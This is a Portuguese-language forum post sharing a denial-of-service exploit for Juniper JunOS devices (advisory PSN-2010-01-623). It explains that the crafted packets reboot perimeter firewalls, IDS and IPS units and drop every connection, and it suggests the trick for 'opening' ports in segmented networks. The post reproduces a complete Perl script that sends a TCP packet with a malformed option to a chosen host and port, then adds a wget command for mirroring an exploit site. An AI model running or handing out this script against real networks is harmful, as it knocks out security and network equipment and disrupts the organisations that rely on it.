Jump to content
herakty

Reboot de equipamentos de defesa JunOS PSN-2010-01-623 Exploit

Recommended Posts

herakty

o DDOS por diversos motivos voltou e de várias formas... este é um simples teste para verificar se um equipamente de perimetro ou não, que corra o JunOS (SO do equipamentos de rede Juniper), dizia, para verificar se é vitima de Denial of Service... enviando estes pacotes fará com que o JunOS faça reboot e assim, cai todas as ligações. Em situações especificas e para redes segmentadas pode ser muito útil para "abrir" portas.

Equipamentos Juniper (Segurança de Perimetro, IPS, IDS, Firewall e todo o tipo de equipamentos de redes)

http://www.juniper.net/us/en/products-services/nos/junos/

Video a mostrar

https://www.youtube.com/embed/3bQZFAT8L1g?feature=oembed

Como é pequeno e em PERL vou posta-lo aqui mesmo:

JunOS PSN-2010-01-623 Exploit

by: Jeremy L. Gaddis - January 9th, 2010 19 Comments

Photo by gr33ndud3

$ cat junos-crash.pl 
#!/usr/bin/perl

my $host =      shift;
my $port =      shift;

use             Net::Packet qw($Env);

use             Net::Packet::IPv4;
my $ip =        Net::Packet::IPv4->new(dst => $host);

use             Net::Packet::TCP;

my $tcp =       Net::Packet::TCP->new(
                    dst         => $port,
                    options     =>  "\x65\x02\x01\x01", 
                );

use             Net::Packet::Frame;
my $frame =     Net::Packet::Frame->new(l3 => $ip, l4 => $tcp);

$frame->send;

Extra: uma forma rápida de sacar todos os files de um local remoto. Site mirroring com a melhor ferramenta para isso, até consegue sacar sites com entrada única.

wget -m http://www.rec-sec.com/category/exploits/

teckV

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

×
×
  • Create New...

Important Information

By using this site you accept our Terms of Use and Privacy Policy. We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.